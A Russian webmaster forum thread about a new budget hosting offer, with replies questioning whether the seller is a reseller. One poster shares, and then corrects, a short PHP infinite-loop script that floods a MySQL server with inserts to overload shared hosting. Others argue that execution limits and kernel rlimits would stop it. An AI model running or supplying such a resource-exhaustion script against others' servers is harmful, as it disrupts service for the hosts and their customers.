Новый не дорогой хостинг

12
obmenlink
На сайте с 07.10.2005
17
Damned:
Сайт пока в разработке, но цены такие: за 1мб - 1цент (т.е. за 1доллар вы купите 100 мб). Все остальное не ограниченно.
Первым двум заказчикам, с репутацией выше 1000 предоставлю месяц хостинга по 40 мб бесплатно (чтоб потестили и тут отписались)
Панель: cPanel
Есть:PHP, Perl, MySQL, PgSQL, расширения FrontPage, Mail (smtp и pop сервера, WebMail), парковка доменов, субдомены, cron и многое другое :)

Сервер свой ( железо)? Какой датацентр? Если в аренду берете то где? В Китае, Германии, Штатах? Если реселер напишите чей?...все одно будет понятно тем кто тестить будет ваше предложение.

Ссылки с главных оптом от 30 сайтов. Тиц до 300 ПР до 4х.
D
На сайте с 30.12.2006
14

_Nic_, примерно такое положит любой MySQL сервер, даже у тех кто более серьезно подходит к делу :):

<?php
ini_set("max_execution_time", 10);
define("DBHOST", "localhost");
define("DBNAME", "tester");
define("DBUSER", "root");
define("DBPASS", "");
for(;;)
{
$dbi=@mysql_connect(DBHOST, DBUSER, DBPASS);
mysql_select_db(DBNAME);
mysql_query("INSERT INTO table (flood) VALUES (\"".md5(rand(45154, 454745))."\")");
}
?>

так что...

Портал для веб мастера (http://wmaster.in)
D
На сайте с 30.12.2006
14

Да, я ресселер.

Извиняюсь, ошибка в первой строчке кода, вместо ini_set("max_execution_time", 10); надо ini_set("max_execution_time", 0);

[Удален]

А я честно говоря и несмневался что вы реселлер 😂. Я уважаю тех кто признаёт свои ошибки🚬 . К слову set_time_limit выключаем в php и всё скрипт уходит вы небытиё ваш 😂 😂 😂 после 15 секунд выполнения.

D
На сайте с 30.12.2006
14

Это пока я ресселер ;)

Пока деда не куплю

[Удален]

Чтобы деда покупать - надо уметь дедом управлять, сори за афоризм.

X
На сайте с 29.09.2006
38
Damned:
_Nic_, примерно такое положит любой MySQL сервер, даже у тех кто более серьезно подходит к делу :):

так что...

Почти все современные серверы либо двухпроцессорные либо двухядерные. Такой скрипт повисит на одном ядре и отвалится по истечению срока годности.

Параметр max_execution_time не везде можно менять.

XP-Hosting.com (http://xp-hosting.com)
Andreyka
На сайте с 19.02.2005
822

На нормальных ядрах execution_time меняй-не меняй, а как прижмет rlimit так ядро и долбанет.

Не стоит плодить сущности без необходимости
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий